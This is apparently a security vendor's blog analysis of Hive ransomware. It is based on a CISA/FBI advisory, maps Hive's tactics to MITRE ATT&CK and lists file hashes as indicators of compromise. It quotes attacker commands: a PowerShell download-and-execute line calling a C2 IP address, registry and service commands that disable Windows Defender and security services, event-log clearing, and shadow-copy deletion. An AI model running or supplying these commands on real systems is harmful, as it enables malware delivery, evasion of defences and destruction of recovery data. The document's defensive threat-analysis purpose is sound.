CISA Alert AA22-321A: Hive Ransomware Analysis, Simulation, TTPs & IOCs

The Red Report 2023

The Top 10 MITRE ATT&CK Techniques Used by Adversaries

DOWNLOAD

On November 17, 2022, CISA and FBI released a joint advisory on Hive ransomware [1]. Hive ransomware group follows the Ransomware-as-a-Service model (RaaS) and targets a wide range of businesses and critical infrastructure sectors such as telecommunications, manufacturing, IT, and the healthcare sector. 

Picus Threat Library already had attack simulations for earlier variants of Hive ransomware. Picus Labs swiftly added attack simulations for the newer variants of Hive ransomware to Picus Threat Library.

Start your 14-day free trial: Test your security against Hive Ransomware!

Hive Ransomware Group

According to the FBI, as of November 2022, Hive ransomware has victimized more than 1300 companies, resulting in a loss of $100 million US dollars as a ransom payment. Hive ransomware follows the Ransomware-as-a-Service model (RaaS), enabling its affiliates to utilize the ransomware as they wish. Developers of the Hive ransomware continuously create, maintain and update their malware and add new defense evasion functionalities, such as evading anti-malware protections.

The victim statistics show that threat actors leveraging the Hive ransomware target a wide range of businesses and critical infrastructure sectors such as telecommunications, manufacturing, information technology, and healthcare. 

Hive Ransomware Analysis and MITRE ATT&CK TTPs

Tactic: Initial Access

The way Hive actors get their initial foothold on their target's system differs depending on the threat actors using the RaaS. For instance, in some scenarios, threat actors leveraged external-facing remote services such as Remote Desktop Connection (RDP), Virtual Private Networks (VPNs), and other remote network connection protocols (ATT&CK T1133). In other cases, they bypassed the Multi-Factor Authentication (MFA) and gained access to FortiOS servers by exploiting an improper authentication vulnerability (CVE-2020-12812) in SSL VPN in FortiOS, enabling threat actors to log in without providing a second authentication factor, FortiToken.

Another initial access method that Hive threat actors use is sending phishing emails with malicious attachments that exploit ProxyShell vulnerabilities. (ATT&CK T1190). 

Further analysis shows that Hive actors manage to deploy a webshell on the compromised Windows Exchange Server. 


Figure 1:  Deploying a webshell on the compromised Windows Exchange Server [1]

Windows released patches for these three vulnerabilities in April and May 2021 as part of their "Patch Tuesday" releases.

Tactic: Execution 

After establishing initial access to the compromised Windows Exchange Server, the Hive ransomware group executes some PowerShell commands to download malicious binaries from their Command and Control (C2) server (ATT&CK T1059). Adversaries download malware directly to the compromised host's memory and execute them using PowerShell's Invoke-Expression (IEX) cmdlet.

IEX (New-Object Net.WebClient).DownloadString('http://139.60.161.228:3389/a')

Example 1: Downloading and executing malware using the Invoke-Expression cmdlet 

In addition, Hive actors download and execute an additional obfuscated PowerShell script, which was later analyzed as a part of the Cobalt Strike framework. VirusTotal shows that the malicious file gets flagged by 41 out of 69 detections.

Figure 2: VirusTotal result of the malicious file downloaded by Hive ransomware group

Tactic: Persistence 

Adversaries establish persistence by creating a new user called "user" and add this new user to both the "Remote Desktop User" and "Administrators" groups (ATT&CK T1136). This action also gives this new user NT AUTHORITY\SYSTEM privileges. Later, adversaries used this account to access the critical files containing valid user credentials, RDP access to backup servers, etc. 

Tactic: Credential Access 

Next, Hive actors use Mimikatz's sekurlsa::logonpasswords module to dump NTLM hashes (ATT&CK T1003) of all the accounts currently logged into the system and use the Administrator's NTLM hash to perform a Pass-the-Hash (PtH) attack.


Figure 3: Pass-the-Hash Attack [1]

Tactic: Lateral Movement

Using the stolen user credentials, adversaries leverage the "mstsc.exe /v:target_computer_name" command to send RDP requests (ATT&CK T1021.001) to many devices within the same network with the attackers to make sure that attackers have access to the critical databases to deploy ransomware, and therefore to gain higher impact.

Tactic: Discovery

Hive actors list all the domain joint assets into a file called domains.txt using the  SoftPerfect tool. Then, they execute a batch script called p.bat to test if the discovered assets are alive.

for /f %%in (domains.txt) do ping %%i -n 1 >> res.txt

Example 2: Command in the p.bat script

Tactic: Defense Evasion

Hive ransomware group distributes a file with a benign-looking name, "windows.exe" to compromised hosts in their victim's network. In reality, this file is the ransomware payload written in the Go language. "windows.exe" payload uses several defense evasion techniques.

  • Impair Defenses: Disable or Modify Tools (ATT&CK 1562.001)

net.exe stop "SamSs" /y

Example 3: Stopping Security Accounts Manager to prevent alarming SIEM systems

  • Modify Registry (ATT&CK T1112)

reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f

Example 4: Disabling Windows Defender via Registry Tool

  • Indicator Removal (ATT&CK T1070)

wevtutil.exe cl security
wevtutil.exe cl system
wevtutil.exe cl application

Example 5: Clearing Windows Security Event Logs

Tactic: Exfiltration 

Prior to the encryption process, the Hive ransomware group exfiltrates sensitive data from the victim host by leveraging a combination of rclone and the cloud storage service Mega.nz (ATT&CK T1537).

Tactic: Impact

vssadmin.exe delete shadows /all /quiet
wmic.exe shadowcopy /nointeractive
wmic.exe shadowcopy delete

Example 6: Deleting volume shadow copies to inhibit system recovery (ATT&CK T1490)

Upon executing the commands above, the encryption process starts. During the encryption, ransomware drops a key file (*.key) required for decryption on the root directory of the target system [2]. Then the ransom note file is created, HOW_TO_DECRYPT.txt, stating that the key file is required for decryption and any attempt to modify, rename or delete this key file will turn the recovery phase into a dead-end (ATT&CK T1486). 


Figure 3: Hive ransom note [1]

Like other ransomware groups that use the double-extortion model, Hive ransomware leaks sensitive information on their website called "HiveLeaks" if their victims do not pay the ransom.

How Picus Helps Simulate Hive Ransomware Attacks?

Picus Threat Library already had threats for the Hive ransomware used in the earlier attack campaigns. Picus Labs added attack simulations for the latest variant of Hive ransomware. We strongly suggest simulating Hive ransomware attacks to test the effectiveness of your security controls against ransomware attacks using the Picus Complete Security Validation Platform. You can test your defenses against Hive ransomware and many other ransomware families within minutes with a 14-day free trial of the Picus Platform.

Picus Threat Library includes the following threats for Hive ransomware

Threat ID

Action Name

Attack Module

59759

Hive Ransomware Campaign

Endpoint

28770

Hive Ransomware Download Threat

Network Infiltration

63385

Hive Ransomware Email Threat

Email Infiltration

Indicators of Compromises (IOCs)

MD5

SHA1

SHA256

6c9ad4e67032301a61a9897377d9cff8

655979d56e874fbe7561bb1b6e512316c25cbb19

e81a8f8ad804c4d83869d7806a303ff04f31cce376c5df8aada2e9db2c1eeb98

6a58b52b184715583cda792b56a0a1ed

3477a173e2c1005a81d042802ab0f22cc12a4d55

d0c1662ce239e4d288048c0e3324ec52962f6ddda77da0cb7af9c1d9c2f1e2eb

4fdabe571b66ceec3448939bfb3ffcd1

763499b37aacd317e7d2f512872f9ed719aacae1

8b9c7d2554fe315199fae656448dc193accbec162d4afff3f204ce2346507a8a

bb7c575e798ff5243b5014777253635d

2146f04728fe93c393a74331b76799ea8fe0269f

572d88c419c6ae75aeb784ceab327d040cb589903d6285bbffa77338111af14b

5e1575c221f8826ce55ac2696cf1cf0b

ecf794599c5a813f31f0468aecd5662c5029b5c4

047c2d5a6cf769c33e019c0b576aef702cae77f3418f0aeba0706467be5ba681

d46104947d8478030e8bcfcc74f2aef7

d1ef9f484f10d12345c41d6b9fca8ee0efa29b60

 

2401f681b4722965f82a3d8199a134ed

2aee699780f06857bb0fb9c0f73e33d1ac87a385

 

References

[1] N. Ovadia, "Hive Ransomware Analysis," Apr. 19, 2022. https://www.varonis.com/blog/hive-ransomware-analysis. [Accessed: Dec. 08, 2022]

[2] "#StopRansomware: Hive Ransomware." https://www.cisa.gov/uscert/ncas/alerts/aa22-321a. [Accessed: Dec. 08, 2022]